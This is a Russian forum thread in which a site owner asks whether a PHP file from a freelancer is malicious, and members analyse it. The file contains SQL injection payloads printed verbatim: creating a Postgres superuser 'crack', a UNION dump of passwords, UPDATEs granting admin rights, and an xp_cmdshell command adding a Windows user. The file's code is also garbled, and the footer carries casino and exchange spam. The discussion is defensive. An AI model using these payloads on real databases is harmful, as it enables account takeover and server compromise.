Фрилансер вместе с работой скинул файл в котором вот такой подозрительный код, что это?

Сообщений: 58 Регистрация: Дек 2011

20 Июля 2018 19:43

Что значит этот короткий код в файле, я так понимаю это взлом сервера?

<?php
$servername = $host;
$database = $db;
$username = $name;
$password = $pass;

$sql = "mysql:host=$servername;dbname=$database;";
$dsn_Options = [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION];

try {
$my_Db_Connection = new PDO($sql, $username, $password, $dsn_Options);
echo "Connected successfully";
} catch (PDOException $error) {
echo 'Connection error: ' . $error->getMessage();
}

$my_Insert_Statement = $my_Db_Connection->prepare("INSERT INTO catalog (name, lastname, email) VALUES (:first_name, :last_name, :email)");

$my_Insert_Statement->bindParam(:first_name, $first_Name);
$my_Insert_Statement->bindParam(:last_name, $last_Name);
$my_Insert_Statement->bindParam(:email, $email);

if ($my_Insert_Statement->execute()) {
echo "OK";
} else {
echo "Error";
}
$my_Insert_Statement->execute();

if ($my_Insert_Statement->execute()) {
echo "OK";
} else {
echo "Error";
}

$offset = $argv[0];
$query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";
$result = pg_query($conn, $query);

insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd)
select 'crack', usesysid, 't','t','crack'
from pg_shadow where usename='postgres';$query = "SELECT id, name, inserted, size FROM products
WHERE size = '$size'";
$result = odbc_exec($conn, $query);

union select '1', concat(uname||'-'||passwd) as name, '1971-01-01', '0' from usertable;

// $uid: ' or uid like '%admin%
$query = "UPDATE usertable SET pwd='...' WHERE uid='' or uid like '%admin%';";

// $pwd: hehehe', trusted=100, admin='yes
$query = "UPDATE usertable SET pwd='hehehe', trusted=100, admin='yes' WHERE
...;";

$query = "SELECT * FROM products
WHERE id LIKE '%a%'
exec master..xp_cmdshell 'net user test testpass /ADD' --%'";
$result = mssql_query($query);

//Establishes the connection
$conn = sqlsrv_connect($serverName, $connectionOptions);
$tsql= "SELECT TOP 20 pc.Name as CategoryName, p.name as ProductName
FROM [SalesLT].[ProductCategory] pc
JOIN [SalesLT].[Product] p
ON pc.productcategoryid = p.productcategoryid";
$getResults= sqlsrv_query($conn, $tsql);
echo ("Reading data from table" . PHP_EOL);
if ($getResults == FALSE)
echo (sqlsrv_errors());
while ($row = sqlsrv_fetch_array($getResults, SQLSRV_FETCH_ASSOC)) {
echo ($row['CategoryName'] . " " . $row['ProductName'] . PHP_EOL);
}
sqlsrv_free_stmt($getResults);

?>

Eye

Сообщений: 22559 Регистрация: Май 2011

20 Июля 2018 21:35

Ну на вскидку код в БД сбрасывает каких-то юзверей (по паролям) и устанавливает кому-то из них пароль 'crack' или 'hehehe', а также права админа. Но это очень приблизительно.

Мы не можем похвастаться мудростью глаз
И умелыми жестами рук,
Нам не нужно все это, чтобы друг друга понять.
Сигареты в руках, чай на столе - так замыкается круг,
И вдруг нам становится страшно что-то менять.

Владимир Ленский

Сообщений: 217 Регистрация: Ноя 2012

21 Июля 2018 01:55

Можно много чего предполагать, уточнили бы. Похоже увязаны как то товары и пользователи, может сброс пароля для редактирования товаров пользователя.. На этапе разработки какие то вещи тестируются отдельно, иногда в отдельных файлах.. зачем оно скажет тот кто делал

VPS/VDS с тестовым периодом (обзор)

Иван Петров

Сообщений: 58 Регистрация: Дек 2011

23 Июля 2018 12:05

Вот несколько статей, они и натолкнули меня на мысль что этот код подозрителен https://studwood.ru/1047029/informatika/vnedrenie https://konyakov.ru/pubs/php/php7/security.database.sql-injection.html

INWOXER

Сообщений: 1015 Регистрация: Окт 2014

23 Июля 2018 13:54

Очень подозрительный код, похоже на шелл.

★★★★★

inwoxer.ru - копии сайтов 800 руб, создание сайтов 200 руб, https сертификаты и другие услуги по СОЧНЫМ ценам.
NEW! СЕО аудит 700 руб и прогон Твиттер 500 руб

★★★★★

людмила василюк

Сообщений: 1 Регистрация: Июл 2018

23 Июля 2018 15:35

А я искала помощь в раскрутке - (затёр)

Изменено: Prapovednik - 15 Августа 2018 10:14 (затёр)

Иван Петров

Сообщений: 58 Регистрация: Дек 2011

30 Июля 2018 22:06

Вот еще одну статью нашел с этим кодом http://php.net/manual/ru/security.database.sql-injection.php

Вообщем на мой вопрос для чего нужен этот файл, фрилансер сказал что "файл этот вносит правки в базу данных, добавляя, обновляя, очищая ее"

Не знаю для чего это все ему нужно.

Вы будете сильно удивлены но это один из Пользователей данного форума, он здесь предоставляет свои услуги.... И возможно он даже прочитал эту тему)

Eye

Сообщений: 22559 Регистрация: Май 2011

30 Июля 2018 22:17

Цитата
Иван Петров пишет: фрилансер сказал что "файл этот вносит правки в базу данных, добавляя, обновляя, очищая ее"

врёт

Цитата
Иван Петров пишет: Вы будете сильно удивлены но это один из Пользователей данного форума

Ну а чего удивляться-то, это обычный форум, и детектор лжи при регистрации тут никому проходить не надо.

Иван Петров

Сообщений: 58 Регистрация: Дек 2011

30 Июля 2018 23:09

У него здесь длинная тема с года 2013 и много отзывов, неприятная ситуация

sharkson

Сообщений: 5425 Регистрация: Янв 2014

#10

31 Июля 2018 03:02

Безопасный код со словами crack и вот этим вот UPDATE usertable SET pwd='hehehe', trusted=100, admin='yes' WHERE ??? Да ну нафиг.

НАДЕЖНЫЙ И НЕДОРОГОЙ ХОСТИНГ ТУТ
НЕДОРОГОЙ ХОСТИНГ
ПРОДАМ БЛОГ ЖЖ
СОЗДАНИЕ И НАСТРОЙКА MediaWiki и phpbb3

Lawyer

Модератор

Сообщений: 8470 Регистрация: Апр 2010

#11

31 Июля 2018 08:26

Цитата
Иван Петров пишет: У него здесь длинная тема с года 2013 и много отзывов, неприятная ситуация

Может тогда опубликуете ссылку на тему исполнителя? smile:)

- Вечные ссылки

- Акция 2025: Забери до 5 090 руб. в одни руки

- Размещение ссылок, прогоны. БОЛЬШИЕ СКИДКИ!

flynstr

Сообщений: 211 Регистрация: Июн 2014

#12

8 Августа 2018 16:16

Самый интересный участок:

Код
$query = "SELECT * FROM products WHERE id LIKE '%a%' exec master..xp_cmdshell 'net user test testpass /ADD' --%'"; $result = mssql_query($query);

Создает в системе юзера "test", пароль "testpass", ну а дальше дело повышения привилегий, что как правило, опытному специалисту не составляет труда.

Лечение сайта / сайтов с вирусами

Мониторинг обменных пунктов WebMoney по выгодным условиям

Prapovednik Модератор Сообщений: 65475 Регистрация: Мар 2010	#13 15 Августа 2018 10:14 людмила василюк, бан. затёр Прикрепленные файлы людмила василюк.jpg (29.55 КБ) [ Скачать ] Продвигай сайты ЛЮБОЙ тематики! Вечные ссылки и статьи. * Тренды SEO 2026: Как продвигать сайт и сделать его магнитом для посетителей (и поисковиков в придачу)

Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)

Новые темы	Объявления	Свободное общение
23:49 Телега на ручнике: РКН включил замедление и логи админок покраснели 21:59 Яндекс туда же: "Нейро" отжал 50% первого экрана. Органический трафик падает 14:47 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 08:28 OpenAI и шейхи: Цензура на продажу и "гибкие" идеалы амеров 22:45 Биржа купли-продажи сайтов, каналов и сообществ 22:08 Гугл пухнет от кеша, а нам - крошки. Разбор $114 млрд: Адсенс в минусе, Ютуб на подписках 22:13 SEO под нейро	23:04 Volna.money 23:01 GoodsMoney.io 21:54 Mixmasters - Exchange without AML and KYC 17:30 CryptoMonitor.info - ваш надеждный обменник BTC USDT XMR (без KYC) 17:23 YoChange.com - Ваш лучший помощник в обмене цифровых валют! 13:19 Portfel.cc - современный помощник в Ваших финансовых операциях. 12:38 Продвижение сайта: [SEO-трафик][Вывод в ТОП][Крауд-маркетинг + SEO]	01:22 ТОП +11+КáЗино В Которых Побеждают – Реальный Рейтинг 2026 00:39 ТОП*10++30+ЛегальныХ+Online-CáSiNo на 2026 ГОД: ^ за Рейтинга +_93 Лучших Площадок в Российской Федерации 00:37 +!11*+!10!!++ ЛУЧШИХ ОНЛАЙН-CáSINO НА 2026 ГОД: от Рейтинга +51_Лучших площадок в России и СНГ 00:33 10__КáZино с Выводом Денег Без Верификации: Рейтинг +A15 Лучших Площадок в России 2026 00:27 ТОП-10!!!+++ Самые Надежные КáZино Онлайн 2026: Честный Рейтинг +99 Площадок в РФ с Выплатами 23:39 Добро пожаловать в цифровой мир... 22:57 Точные прогнозы на футбол